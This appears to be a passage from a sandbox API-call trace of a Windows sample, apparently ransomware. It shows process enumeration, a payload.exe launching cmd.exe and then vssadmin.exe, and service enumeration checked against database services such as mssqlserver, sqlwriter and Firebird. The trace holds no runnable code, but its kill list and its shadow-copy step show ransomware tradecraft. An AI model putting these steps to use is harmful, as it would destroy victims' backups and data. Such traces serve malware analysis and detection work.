cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.809] lstrlenW (lpString="svchost.exe") returned 11 [0055.809] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.809] lstrlenW (lpString="svchost.exe") returned 11 [0055.809] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.810] lstrlenW (lpString="svchost.exe") returned 11 [0055.810] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.811] lstrlenW (lpString="audiodg.exe") returned 11 [0055.811] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.811] lstrlenW (lpString="svchost.exe") returned 11 [0055.811] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.812] lstrlenW (lpString="svchost.exe") returned 11 [0055.812] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.813] lstrlenW (lpString="dwm.exe") returned 7 [0055.813] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.813] lstrlenW (lpString="explorer.exe") returned 12 [0055.814] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.814] lstrlenW (lpString="spoolsv.exe") returned 11 [0055.814] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.815] lstrlenW (lpString="taskhost.exe") returned 12 [0055.815] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.816] lstrlenW (lpString="svchost.exe") returned 11 [0055.816] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0055.880] lstrlenW (lpString="taskeng.exe") returned 11 [0055.881] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.881] lstrlenW (lpString="taskhost.exe") returned 12 [0055.881] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0055.882] lstrlenW (lpString="carried trinity.exe") returned 19 [0055.882] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0055.883] lstrlenW (lpString="heaven.exe") returned 10 [0055.883] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0055.884] lstrlenW (lpString="dell.exe") returned 8 [0055.884] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0055.884] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0055.884] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0055.885] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0055.885] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0055.886] lstrlenW (lpString="til ear equal.exe") returned 17 [0055.886] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0055.886] lstrlenW (lpString="itunes-bring.exe") returned 16 [0055.886] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0055.887] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0055.887] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0055.888] lstrlenW (lpString="philadelphia.exe") returned 16 [0055.888] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0055.888] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0055.889] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0055.889] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0055.889] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0055.890] lstrlenW (lpString="fraud stuck.exe") returned 15 [0055.890] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0055.890] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0055.891] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0055.891] lstrlenW (lpString="attended.exe") returned 12 [0055.891] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0055.892] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0055.892] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0055.893] lstrlenW (lpString="pan physician.exe") returned 17 [0055.893] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0055.894] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0055.894] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0056.340] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0056.341] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0056.341] lstrlenW (lpString="over-celebrity.exe") returned 18 [0056.341] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.342] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0056.342] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0056.343] lstrlenW (lpString="payload.exe") returned 11 [0056.343] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.343] lstrlenW (lpString="cmd.exe") returned 7 [0056.343] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.344] lstrlenW (lpString="conhost.exe") returned 11 [0056.344] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0056.345] lstrlenW (lpString="vssadmin.exe") returned 12 [0056.345] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0056.346] lstrlenW (lpString="VSSVC.exe") returned 9 [0056.346] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.346] lstrlenW (lpString="svchost.exe") returned 11 [0056.347] Process32NextW (in: hSnapshot=0x224, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0056.347] CloseHandle (hObject=0x224) returned 1 [0056.347] Sleep (dwMilliseconds=0x1f4) [0056.998] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625d20 [0056.998] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0056.999] GetLastError () returned 0xea [0056.999] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0056.999] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0057.000] CloseServiceHandle (hSCObject=0x625d20) returned 1 [0057.000] lstrlenW (lpString="Appinfo") returned 7 [0057.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0057.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0057.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0057.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0057.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0057.000] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0057.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.000] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0057.000] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0057.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0057.000] lstrlenW (lpString="AudioSrv") returned 8 [0057.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0057.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0057.001] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0057.001] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0057.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0057.001] lstrlenW (lpString="BFE") returned 3 [0057.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0057.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0057.001] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0057.001] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0057.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0057.001] lstrlenW (lpString="CryptSvc") returned 8 [0057.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0057.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0057.001] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0057.001] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0057.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0057.001] lstrlenW (lpString="CscService") returned 10 [0057.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0057.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0057.001] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0057.001] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0057.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0057.001] lstrlenW (lpString="DcomLaunch") returned 10 [0057.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.002] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0057.002] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0057.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0057.002] lstrlenW (lpString="Dhcp") returned 4 [0057.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0057.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0057.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0057.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0057.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0057.002] lstrlenW (lpString="Dnscache") returned 8 [0057.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0057.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0057.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0057.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0057.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0057.003] lstrlenW (lpString="DPS") returned 3 [0057.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0057.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0057.003] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0057.003] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0057.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0057.003] lstrlenW (lpString="eventlog") returned 8 [0057.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0057.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0057.003] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0057.003] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0057.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0057.003] lstrlenW (lpString="EventSystem") returned 11 [0057.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0057.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0057.003] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0057.003] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0057.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0057.003] lstrlenW (lpString="gpsvc") returned 5 [0057.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0057.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0057.003] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0057.003] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0057.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0057.003] lstrlenW (lpString="iphlpsvc") returned 8 [0057.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.003] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0057.003] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0057.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0057.003] lstrlenW (lpString="LanmanServer") returned 12 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0057.004] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0057.004] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0057.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0057.004] lstrlenW (lpString="LanmanWorkstation") returned 17 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.004] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0057.004] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0057.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0057.004] lstrlenW (lpString="lmhosts") returned 7 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0057.004] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0057.004] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0057.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0057.004] lstrlenW (lpString="MMCSS") returned 5 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0057.004] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0057.004] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0057.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0057.004] lstrlenW (lpString="MpsSvc") returned 6 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0057.004] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0057.004] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0057.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0057.004] lstrlenW (lpString="Netman") returned 6 [0057.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0057.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0057.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0057.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0057.005] lstrlenW (lpString="netprofm") returned 8 [0057.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0057.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0057.005] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0057.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0057.005] lstrlenW (lpString="NlaSvc") returned 6 [0057.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0057.005] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0057.005] lstrlenW (lpString="nsi") returned 3 [0057.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0057.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 